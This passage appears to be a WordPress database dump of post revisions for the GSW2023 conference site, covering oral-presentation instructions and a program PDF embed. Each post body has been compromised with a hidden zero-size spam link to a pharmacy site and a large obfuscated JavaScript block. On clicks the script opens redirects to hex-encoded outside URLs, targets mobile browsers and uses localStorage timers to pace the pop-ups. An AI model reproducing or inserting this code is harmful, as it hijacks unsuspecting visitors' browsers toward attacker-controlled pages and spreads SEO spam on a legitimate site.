)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Sensor Fusion for Mapping and Navigation','','inherit','closed','closed','','4010-revision-v1','','','2023-08-16 21:33:30','2023-08-16 21:33:30','',4010,'https://gsw2023.com/?p=5306',0,'revision','',0),
(5327,0,'2023-08-18 08:27:39','2023-08-18 08:27:39','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-08-18 08:27:39','2023-08-18 08:27:39','',5139,'https://gsw2023.com/?p=5327',0,'revision','',0),
(5328,0,'2023-08-18 08:27:39','2023-08-18 08:27:39','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/G<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>SW2023-Program-2023-08-13.doc.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 